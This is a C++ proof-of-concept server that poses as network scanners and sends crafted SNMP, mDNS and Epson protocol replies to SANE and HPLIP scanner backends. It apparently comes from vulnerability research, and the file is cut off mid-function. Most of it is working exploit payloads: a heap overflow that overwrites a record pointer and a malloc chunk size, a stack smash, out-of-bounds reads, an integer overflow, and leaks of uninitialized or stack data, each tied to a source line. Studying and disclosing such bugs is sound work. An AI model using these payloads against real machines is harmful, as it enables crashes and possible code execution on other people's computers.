#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <assert.h>
#include <sys/epoll.h>
#include <netdb.h>
#include <unistd.h>
#include <algorithm>
#include "utils.hpp"

// ASN.1 BER universal tag numbers (the low bits of an identifier octet).
// Note that ASN_SEQUENCE/ASN_SET are bare tag numbers: an encoded SEQUENCE
// identifier is ASN_SEQUENCE | ASN_CONSTRUCTOR (0x30 == 48), which is the
// literal used in the SNMP payload below.
#define ASN_BOOLEAN         0x01
#define ASN_INTEGER         0x02
#define ASN_BIT_STR         0x03
#define ASN_OCTET_STR       0x04
#define ASN_NULL            0x05
#define ASN_OBJECT_ID       0x06
#define ASN_SEQUENCE        0x10
#define ASN_SET             0x11

// Tag class, stored in the top two bits of the identifier octet.
#define ASN_UNIVERSAL       0x00
#define ASN_APPLICATION     0x40
#define ASN_CONTEXT         0x80
#define ASN_PRIVATE         0xC0

// Primitive/constructed flag, long-form length marker, and the tag value
// that signals an extended (multi-octet) tag number.
#define ASN_PRIMITIVE       0x00
#define ASN_CONSTRUCTOR     0x20
#define ASN_LONG_LEN        0x80
#define ASN_EXTENSION_ID    0x1F
#define ASN_BIT8            0x80

// SNMP application type [APPLICATION 1] (Counter).
#define ASN_COUNTER         (ASN_APPLICATION | 1)

// SNMP PDU identifiers: context-specific, constructed, numbered 0..8.
#define SNMP_MSG_GET        (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x0)
#define SNMP_MSG_GETNEXT    (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x1)
#define SNMP_MSG_RESPONSE   (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x2)
#define SNMP_MSG_SET        (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x3)
#define SNMP_MSG_TRAP       (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x4)
#define SNMP_MSG_GETBULK    (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x5)
#define SNMP_MSG_INFORM     (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x6)
#define SNMP_MSG_TRAP2      (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x7)
#define SNMP_MSG_REPORT     (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x8)

// This SNMP handler is the first stage of the Magicolor code.  The code in
// magicolor.c uses libsnmp to search the network for scanners. The
// response uses asn1 encoding, but I didn't find any bugs in the asn1
// parser. There is a minor bug in mc_network_discovery_handle though:
//
// magicolor.c:1915
//   cap = mc_get_device_from_identification (device);
//
// `device` is an uninitialized local variable. Ironically, this bug
// gets cancelled by another bug in mc_get_device_from_identification:
//
//  static struct MagicolorCap *
//  mc_get_device_from_identification (const char*ident)
//  {
//          int n;
//          for (n = 0; n < NELEMS (magicolor_cap); n++) {
//                  if (strcmp (magicolor_cap[n].model, ident) || strcmp (magicolor_cap[n].OID, ident))
//                          return &magicolor_cap[n];
//          }
//          return NULL;
//  }
//
// The bug is that strcmp returns 0 when the strings are equal, so this
// function always succeeds immediately on the first iteration of the loop,
// even when `ident` contains garbage (which it does because it's
// uninitialized).
class SNMPHandlerUDP : public RecvHandlerUDP {
public:
  SNMPHandlerUDP() {}
  virtual ~SNMPHandlerUDP() {}

  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    printf("SNMP discover ");
    print_addr(peer_addr, peer_addr_len);
    printf("\n");
    ssize_t i;
    for (i = 0; i < len; i++) {
      printf("%.2x", buf[i]);
    }
    printf("\n");

#define PAYLOAD_SIZE 16

    const uint8_t response[] =
      { 48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        (3 + 11 + 1) + (1 + 23 + 2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE)), // Total length
        ASN_INTEGER, 1, 1, // Version number = 1
        ASN_OCTET_STR, 9, 'k','e','v','w','o','z','e','r','e',
        SNMP_MSG_TRAP, // We have a choice here
        23 + 2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE),
        ASN_OBJECT_ID,
        4, 20,21,22,23, // objid of length 4
        ASN_OCTET_STR, 4, 'k','e','v','w',
        ASN_INTEGER, 1, 1, // pdu->trap_type = 1
        ASN_INTEGER, 1, 1, // pdu->specific_type = 1
        ASN_COUNTER, 1, 1,  // pdu->time = 1
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + (2 + 8 + 15) + 2 + (2 + 8 + 2 + PAYLOAD_SIZE), // Length of varbind sequence.
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + 8 + 15,
        ASN_OBJECT_ID,
        8, 0x2B, 6, 1, 2, 1, 1, 2, 0, // objid of length 8 (MAGICOLOR_SNMP_SYSOBJECT_OID)
        ASN_OBJECT_ID, 13, 0x2B, 6, 1, 4, 1, // objid of length 13 (MAGICOLOR_SNMP_DEVICE_TREE)
          0x81, 0x8F, 0x1E, // 18834
          1, 1, 1, 1, 1,
        48, // ASN_SEQUENCE | ASN_CONSTRUCTOR
        2 + 8 + 2 + PAYLOAD_SIZE,
        ASN_OBJECT_ID,
        8, 0x2B, 6, 1, 2, 1, 1, 1, 0, // objid of length 8 (MAGICOLOR_SNMP_SYSDESCR_OID)
        ASN_OCTET_STR, PAYLOAD_SIZE,
        'A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A'
      };

    printf("sizeof(response) = %ld\n", sizeof(response));
    sock.replyto(
      (const char*)response, sizeof(response),
      peer_addr, peer_addr_len
    );

    return 0;
  }
};

// This handler accepts a connection from magicolor.c.  It just contains
// the basic logic to handle the initial handshake and doesn't do anything
// deliberately malicious.  But if you press the "Scan" button after the
// connection is complete, then simple-scan crashes with a SIGFPE at
// magicolor.c, line 1146:
//
// s->block_len = (int)(0xff00/s->scan_bytes_per_line) * s->scan_bytes_per_line;
//
// The crash happens because `scan_bytes_per_line` is zero.  I believe
// that's because this handler responds to the cmd_get_scanning_parameters
// (magicolor.c:815) with a buffer full of zeros. Note: this TCP handler is
// very incomplete and doesn't parse the Magicolor messages properly, so it
// mistakenly thinks that it's handling another connection handshake when
// it's actually handling a scanning attempt. The buffer full of zeros is
// sent by the `S_fin` logic.
class MagicolorHandlerTCP : public RecvHandlerTCP {
  // Steps of the scripted conversation. accept() sends the welcome message;
  // each receive() answers one incoming message and moves along
  // S_ack -> S_err1 -> S_fin -> S_err2 -> S_close, and S_close resets to
  // S_ack and asks for the connection to be dropped.
  enum State {
    S_ack,
    S_err1,
    S_fin,
    S_err2,
    S_close
  };

  State state_;

  // Send `size` bytes from `data` to the peer. A failure is logged and
  // otherwise ignored.
  static void send_logged(SocketHandlerTCP& sock, const char* data, size_t size) {
    if (sock.reply(data, size) < 0) {
      printf("send failed.\n");
    }
  }

public:
  MagicolorHandlerTCP() : state_(S_ack) {}

  // Greet a freshly accepted connection with {4, 0, 0}. The return value is
  // the byte count handed back to the framework (as with every handler in
  // this file, presumably the size of the next message to wait for).
  virtual ssize_t accept(SocketHandlerTCP& sock) override {
    printf("Sending welcome message.\n");

    // Send back a welcome message.
    static const char welcome[3] = {4, 0, 0};
    send_logged(sock, welcome, sizeof(welcome));

    state_ = S_ack;
    return 5;
  }

  // Answer the incoming message according to the current step. The payload
  // is ignored. Returns the next byte count, or -1 to close the connection.
  virtual ssize_t receive(SocketHandlerTCP& sock, const uint8_t*) override {
    static const char ack_msg[3] = {4, 2, 0};
    static const char status_ok[1] = {0};
    // The all-zero block that ends up answering cmd_get_scanning_parameters.
    static const char zero_block[0xb] = {};

    if (state_ == S_ack) {
      // Send back the ack message.
      printf("magicolor ack\n");
      send_logged(sock, ack_msg, sizeof(ack_msg));
      state_ = S_err1;
      return 64;
    }

    if (state_ == S_err1) {
      // Send back the error status.
      printf("magicolor err1\n");
      send_logged(sock, status_ok, sizeof(status_ok));
      state_ = S_fin;
      return 64;
    }

    if (state_ == S_fin) {
      printf("magicolor fin\n");
      send_logged(sock, zero_block, sizeof(zero_block));
      state_ = S_err2;
      return 64;
    }

    if (state_ == S_err2) {
      // Send back the error status.
      printf("magicolor err2\n");
      send_logged(sock, status_ok, sizeof(status_ok));
      state_ = S_close;
      return 3;
    }

    if (state_ == S_close) {
      printf("magicolor close\n");
      state_ = S_ack;
    }
    return -1;
  }

  virtual void disconnect() override {}
};

// Factory that creates a fresh MagicolorHandlerTCP for each accepted TCP
// connection. The peer address is not used.
class BuildMagicolorHandlerTCP : public BuildRecvHandlerTCP {
public:
  virtual RecvHandlerTCP* build(sockaddr* /*peer*/, socklen_t /*peer_len*/) override {
    RecvHandlerTCP* const handler = new MagicolorHandlerTCP;
    return handler;
  }
};

// The exact bytes of the buffer sent by this call (mdns.c:442):
//
//   mdns_send_query(udp_socket, "_scanner._tcp.local", QTYPE_PTR);
//
// Layout: a 12-byte DNS header whose only non-zero field is the question
// count (1); the name as length-prefixed labels
// ("\x08_scanner" "\x04_tcp" "\x05local" "\x00"); then QTYPE = 0x000c (PTR)
// and QCLASS = 0x0001 (IN). HplipHandler only replies to datagrams that
// match these 37 bytes exactly.
static const char scanner_tcp_local[37] = {
  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x08, 0x5f, 0x73, 0x63, 0x61, 0x6e, 0x6e, 0x65, 0x72, 0x04, 0x5f, 0x74,
  0x63, 0x70, 0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00,
  0x01
};

// The exact bytes of the buffer sent by this call (mdns.c:443):
//
//   mdns_send_query(udp_socket, "_uscan._tcp.local", QTYPE_PTR);
//
// Same layout as scanner_tcp_local: a 12-byte header with one question, the
// labels "\x06_uscan" "\x04_tcp" "\x05local" "\x00", then QTYPE = 0x000c
// (PTR) and QCLASS = 0x0001 (IN).
static const char uscan_tcp_local[35] = {
  0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x06, 0x5f, 0x75, 0x73, 0x63, 0x61, 0x6e, 0x04, 0x5f, 0x74, 0x63, 0x70,
  0x05, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x00, 0x00, 0x0c, 0x00, 0x01
};

// Fake mDNS responder for the hplip scanner discovery code. It logs every
// query it receives and answers the "_scanner._tcp.local" PTR query with a
// crafted response. The constructor's `mode` argument selects the response:
//   0 - heap overflow in mdns_readName
//   1 - stack buffer overflow in mdns_update_uris
//   2 - out-of-bounds read while skipping a record
class HplipHandler : public RecvHandlerUDP {
  // The response sent to every matching query. The constructor zero-fills
  // it and then writes the selected payload at the start. All 2048 bytes
  // are sent, trailing zeros included.
  char malicious_response_buf[2048];

  // Write the 12-byte DNS header shared by every payload. id, flags, the
  // answer count and the authority count are all zero; `questions` and
  // `additionals` go in the low byte of their big-endian 16-bit fields.
  // Returns the number of bytes written (always 12).
  static size_t write_dns_header(char* buf, uint8_t questions, uint8_t additionals) {
    memset(buf, 0, 12);  // id, flags, questions, answers, authorities, additionals
    buf[5] = questions;
    buf[11] = additionals;
    return 12;
  }

  // Store `value` at `dst` in host byte order. memcpy is used because `dst`
  // is generally not 8-byte aligned; writing through a uint64_t* there is
  // undefined behavior (misaligned access and a strict-aliasing violation).
  static void store_u64(char* dst, uint64_t value) {
    memcpy(dst, &value, sizeof(value));
  }

  // Trigger a buffer overflow in mdns_readName (mdns.c:191).  The
  // destination buffer is `rr->name`, which is a 256 byte buffer. We will
  // write off the end of it, overwriting the `rr->next` pointer.  The
  // bogus pointer triggers a crash at mdns.c:393.
  static size_t init_buf_heap_overflow(char* buf) {
    size_t pos = write_dns_header(buf, 1, 0);

    // mdns_readName (mdns.c:279)
    buf[pos++] = 0xBF;
    memset(buf + pos, 'x', 0xBF);
    pos += 0xBF;
    buf[pos++] = 0x50;
    memset(buf + pos, 'x', 0x40);
    pos += 0x40;
    store_u64(buf + pos, 0xFEDCBA9876543210);  // pointer to next DNS_RECORD
    store_u64(buf + pos + 8, 604);             // mchunk_size (malloc.c)
    pos += 0x10;
    buf[pos++] = 0; // End the name

    printf("setzero size=%zu\n", pos);
    return pos;
  }

  // Trigger a stack buffer overflow in mdns_update_uris (mdns.c:396).
  static size_t init_buf_stack_smash(char* buf) {
    size_t pos = write_dns_header(buf, 0, 2);

    // mdns_readName (mdns.c:279). Copies 10 bytes: the 9-character label
    // plus its NUL, which doubles as the end-of-name marker.
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_TXT (16). (mdns.c:280). The 6 skipped bytes (class and
    // TTL) are left as the zeros the caller filled the buffer with.
    buf[pos++] = 0;
    buf[pos++] = 16;
    pos += 6;

    // data_len = 256. (mdns.c:283)
    buf[pos++] = 1;
    buf[pos++] = 0;

    // mdns_readMDL (mdns.c:204)
    const uint8_t modelLen = 0xFF;
    buf[pos++] = modelLen;
    memcpy(buf + pos, "mdl=", 4);
    pos += 4;
    memset(buf + pos, 'x', modelLen - 4);
    pos += modelLen - 4;

    // mdns_readName (mdns.c:279)
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_A (1). (mdns.c:280)
    buf[pos++] = 0;
    buf[pos++] = 1;
    pos += 6;

    // data_len = 4. (mdns.c:283)
    buf[pos++] = 0;
    buf[pos++] = 4;

    // Bogus ip address
    memset(buf + pos, 0xFF, 4);
    pos += 4;

    printf("first response size=%zu\n", pos);
    return pos;
  }

  // Trigger an out of bounds read at mdns.c:279.
  static size_t init_buf_out_of_bounds_read(char* buf) {
    size_t pos = write_dns_header(buf, 0, 2);

    // mdns_readName (mdns.c:279)
    buf[pos++] = 9;
    memcpy(&buf[pos], "kevwozere", 10);
    pos += 10;

    // type = QTYPE_TXT (16). (mdns.c:280)
    buf[pos++] = 0;
    buf[pos++] = 16;
    pos += 6;

    // data_len = 0xFFFF. (mdns.c:283)
    // This causes the pointer `p` to be advanced far beyond the bounds of
    // the buffer, leading to an out of bounds read. This bug does not cause
    // a crash, but it could possibly be used for information disclosure.
    buf[pos++] = 0xFF;
    buf[pos++] = 0xFF;

    // mdns_readMDL (mdns.c:204)
    const uint8_t modelLen = 0xFF;
    buf[pos++] = modelLen;
    memcpy(buf + pos, "mdl=", 4);
    pos += 4;
    memset(buf + pos, 'x', modelLen - 4);
    pos += modelLen - 4;
    return pos;
  }

  // Debug-print an incoming mDNS query: warn if the 12-byte header is not the
  // expected "one question" header, print the queried name's labels
  // separated by '.', then the query type and any trailing bytes in hex.
  // Returns true if the packet ends exactly after the 4 type/class bytes.
  // The asserts restate invariants that the explicit length checks already
  // guarantee.
  static bool parse_packet(const uint8_t* buf, ssize_t size) {
    static const char header[] =
      { 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

    if (size <= (ssize_t)sizeof(header)) {
      return false;
    }

    if (memcmp(buf, header, sizeof(header))) {
      printf("unrecognized header:");
      for (size_t i = 0; i < sizeof(header); i++) {
        printf(" %.2x", buf[i]);
      }
      printf("\n");
    }

    ssize_t pos = sizeof(header);
    while (1) {
      assert(pos < size);
      uint8_t segsize = buf[pos];
      if (segsize == 0) {
        pos++;
        break;
      }
      pos++;
      assert(pos <= size);
      // Require room for the label and at least one more byte after it.
      if (segsize >= size - pos) {
        printf("bad segment size: %d %zd\n", segsize, size-pos);
        return false;
      }
      printf(".");
      for (size_t i = 0; i < segsize; i++) {
        printf("%c", buf[pos + i]);
      }
      pos += segsize;
    }

    printf("\n");

    // The next 4 bytes are: 0, query_type, 0, QCLASS_IN
    assert(pos <= size);
    if (size - pos < 4) {
      printf("message too short\n");
      return false;
    }
    if (buf[pos] != 0 || buf[pos+2] != 0 || buf[pos+3] != 1) {
      printf("buf[pos..pos+3] = %.02x %.02x %.02x %.02x\n",
             buf[pos], buf[pos+1], buf[pos+2], buf[pos+3]);
    }
    uint8_t query_type = buf[pos+1];
    printf("query_type = %x\n", query_type);
    pos += 4;
    printf("remaining bytes: %zd\n", size-pos);

    for (ssize_t i = pos; i < size; i++) {
      printf("%.2x", buf[i]);
    }
    printf("\n");

    return (size == pos);
  }

public:
  // Build the response for `mode` (0, 1 or 2; see the class comment). Any
  // other value is reported and leaves the response all zeros.
  explicit HplipHandler(int mode) {
    memset(malicious_response_buf, 0, sizeof(malicious_response_buf));
    switch (mode) {
    case 0:
      init_buf_heap_overflow(malicious_response_buf);
      break;
    case 1:
      init_buf_stack_smash(malicious_response_buf);
      break;
    case 2:
      init_buf_out_of_bounds_read(malicious_response_buf);
      break;
    default:
      printf("Invalid hplip mode: %d\n", mode);
      break;
    }
  }

  virtual ~HplipHandler() {}

  // Log every datagram. Only an exact "_scanner._tcp.local" PTR query is
  // answered, with the prepared response. Always returns 0.
  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    parse_packet(buf, len);

    if (len != sizeof(scanner_tcp_local)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, scanner_tcp_local, sizeof(scanner_tcp_local)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    printf("send malicious\n");
    if (sock.replyto(
          malicious_response_buf, sizeof(malicious_response_buf),
          peer_addr, peer_addr_len
        ) < 0) {
      printf("failed to send response.\n");
    }
    return 0;
  }
};

// Discovery datagram expected from the Epson backend. The literal spells out
// 14 bytes, and its implicit terminating NUL makes sizeof() 15, so
// EpsonHandlerUDP only reacts to 15-byte datagrams with these contents.
static const char epsonp_discover[15] = "EPSONP\x00\xff\x00\x00\x00\x00\x00\x00";

// Reply to the discovery datagram: a 76-byte buffer that starts with "EPSON"
// followed by spaces. Any bytes the literal does not cover are zero.
static const char epsonp_response[76] =
  "EPSON                                                                      ";

class EpsonHandlerUDP : public RecvHandlerUDP {
public:
  EpsonHandlerUDP() {}
  virtual ~EpsonHandlerUDP() {}

  virtual int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    if (len != sizeof(epsonp_discover)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, epsonp_discover, sizeof(epsonp_discover)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    printf("EPSON discover\n");
    if (sock.replyto(
          epsonp_response, sizeof(epsonp_response),
          peer_addr,
          peer_addr_len
        ) < 0) {
      printf("failed to send response.\n");
    }

    return 0;
  }
};

// Fake Epson network scanner that speaks the "IS"-framed protocol. Every
// message starts with a 12-byte header: "IS", a 16-bit command at bytes 2-3,
// the bytes {0, 12} at 4-5, and a big-endian 32-bit payload size at bytes
// 6-9. Commands of the form 0x20xx are followed by an extra 8-byte header
// holding the payload size and the expected reply length. mode_ selects
// which backend bug the replies are crafted to trigger.
class EpsonHandlerTCP : public RecvHandlerTCP {
  enum HdrState {
    H_wait_hdr, // Waiting for the 12 byte header
    H_wait_extra_hdr, // Waiting for the extra 8 header bytes
    H_wait_payload, // Waiting for the message payload
    H_wait_moreinfo // Waiting for the request for more info
  };

  // What type of payload we are expecting.
  enum PayloadState {
    P_normal,
    P_paramblock,
    P_img
  };

  // mode_ is a command line argument, telling us which bug to target.
  const int mode_;

  HdrState state_;
  PayloadState payload_state_;
  uint16_t cmd_;        // Command from bytes 2-3 of the last header.
  uint32_t buf_size_;   // Payload size announced by the last header.
  uint32_t reply_len_;  // Reply length from the extended header (0 if none).

  // Filled in by the constructor: an "IS" header followed by fake heap chunk
  // sizes. NOTE(review): no code path in this class sends it.
  uint8_t malicious_buf[12 + 0x1271];

  // Read a big-endian uint32 from `p`, which need not be 4-byte aligned.
  static uint32_t load_be32(const uint8_t* p) {
    uint32_t v;
    memcpy(&v, p, sizeof(v));
    return ntohl(v);
  }

  // Store `v` big-endian at `p`, which need not be 4-byte aligned.
  static void store_be32(void* p, uint32_t v) {
    const uint32_t be = htonl(v);
    memcpy(p, &be, sizeof(be));
  }

  // Send a header announcing a 1-byte payload, followed by that byte (6),
  // then wait for the next header.
  ssize_t send_ack(SocketHandlerTCP& sock) {
    const char reply[13] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, 6};
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  // Reply with a well-formed 64-byte INFO block. `more` fills the 7-digit
  // hex field that follows "INFOx".
  void send_info_harmless(SocketHandlerTCP& sock, int more) {
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    snprintf(
      &reply[17], sizeof(reply) - 17,
      "%07x#FB AREAi0000850i0001400#PRDh009kevwozere#---",
      static_cast<unsigned>(more));
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  // Answer the parameter block that follows a "PARAx" command that had no
  // reply length.
  ssize_t send_para_response(SocketHandlerTCP& sock) {
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'P','A','R','A','x','0','0','0','0','0','0','0','#','-','-','-',
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
    state_ = H_wait_hdr;
    payload_state_ = P_normal;
    return 12;
  }

  ssize_t send_img_response(SocketHandlerTCP& sock) {
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    store_be32(&reply[6], reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send a fake image. We specified an enormous image size in
    // the "IMG" case of `eds_send`. (The huge size that we specified
    // is now stored in `reply_len`.) This is going to cause a
    // buffer overflow in esci2_img (epsonds-cmd.c:884).
    char buf[0x10000];
    memset(buf, 0, sizeof(buf));
    uint32_t sentbytes = 0;
    while (sentbytes < reply_len_) {
      const ssize_t wr =
        sock.reply(
          buf, std::min(uint32_t(sizeof(buf)), reply_len_ - sentbytes)
        );
      if (wr < 0) {
        const int err = errno;
        if (err == EAGAIN || err == EWOULDBLOCK) {
          continue;  // Socket buffer full: retry.
        } else {
          printf("send failed: %s\n", strerror(err));
          break;
        }
      } else {
        printf("sent image: %zd bytes\n", wr);
      }
      sentbytes += static_cast<uint32_t>(wr);
    }
    printf("total sent: %zu bytes\n", size_t(sentbytes));

    state_ = H_wait_hdr;
    payload_state_ = P_normal;
    return 12;
  }

  // Handle the payload of an 0x2000 (eds_send) command. `buf` holds
  // buf_size_ bytes of network data and is not NUL-terminated. Returns the
  // next byte count to wait for, or -1 to close the connection.
  ssize_t eds_send(SocketHandlerTCP& sock, const uint8_t* buf) {
    // Print at most the first three payload bytes, never more than buf_size_.
    printf("eds_send:");
    for (uint32_t i = 0; i < 3 && i < buf_size_; i++) {
      printf(" %.02x", buf[i]);
    }
    printf("\n");

    if (buf_size_ == 2 && memcmp(buf, "\x1CX", 2) == 0 && reply_len_ == 1) {
      if (mode_ == 2) {
        // Trigger a buffer overflow at epsonds-net.c:135. We control the
        // value of `size`, so we can write an arbitrary amount of data
        // into `s->netbuf`.
        char reply[4096];
        const char header[12] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0};
        memset(reply, 0xcd, sizeof(reply));
        memcpy(reply, header, sizeof(header));
        store_be32(&reply[6], static_cast<uint32_t>(sizeof(reply)));
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }

        state_ = H_wait_hdr;
        return 12;
      }
      return send_ack(sock);
    } else if (buf_size_ == 12 && memcmp(buf, "INFOx0000000", 12) == 0 && reply_len_ == 64) {
      if (mode_ == 3) {
        // Copy uninitialized data into the reply buffer at epsonds-net.c:164.
        // Because `size == 0`, no data was read from the network, so `s->netbuf`
        // is still a newly malloc-ed buffer, containing uninitialized bytes.
        char reply[13] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 4) {
        // Out of bounds read in decode_binary (epsonds-cmd.c:273)
        // This will read 0xFFF bytes from the stack and copy it into
        // a malloc-ed buffer.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        unsigned int more = 0;
        snprintf(
          &reply[17], sizeof(reply) - 17,
          "%07x#FB AREAi0000850i0001400#PRDhfffkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 5) {
        // Trigger a SIGPIPE in sanei_tcp_write (sanei_tcp.c:120)
        // They should pass the flag MSG_NOSIGNAL to avoid this.
        // Actually, this doesn't cause a crash so this isn't a bug.
        // There must be a signal handler for SIGPIPE.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        snprintf(&reply[17], sizeof(reply) - 17, "%07x#nrdBUSY#---", 0u);
        for (size_t i = 0; i < 4; i++) {
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
        }

        // Close the socket, to trigger a SIGPIPE on the other end.
        return -1;
      } else if (mode_ == 6) {
        // Potential information leak from the sscanf at epsonds-cmd.c:120:
        // the %x format specifier reads off the end of the buffer. If the
        // next bytes on the stack are valid ASCII digits then they will
        // be read into `more` and returned to us in the next message.
        char reply[92] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0',
           '0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0'
          };
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
      } else if (mode_ == 7) {
        // Integer overflow in the count parameter of sanei_tcp_read
        // (sanei_tcp.c:124). Also interesting to note that the error
        // is ignored at epsonds-cmd.c:195.
        // '\xff' rather than -1: a negative initializer is ill-formed
        // (narrowing) on targets where char is unsigned.
        char reply[76 + 12] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           'I', 'S', 0, 0, 0, 12, '\xff', '\xff', '\xff', '\xff', 0, 0
          };
        unsigned int more = 0xFFFFFFFF;
        snprintf(
          &reply[17], sizeof(reply) - 17,
          "%08x#FB AREAi0000850i0001400#PRDh009kevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // Send another byte because `epsonds_net_read_raw` uses `select`
        // to wait until there's more data available before it triggers
        // the call to `sanei_tcp_read`.
        if (sock.reply(reply, 1) < 0) {
          printf("send failed.\n");
        }
      } else {
        send_info_harmless(sock, 0);
      }
      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "CAPAx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'C','A','P','A','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      unsigned int more = 0;
      snprintf(&reply[17], sizeof(reply) - 17, "%07x#RSMRANGi0000050i0000600#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "RESAx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'R','E','S','A','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      unsigned int more = 0;
      snprintf(&reply[17], sizeof(reply) - 17, "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
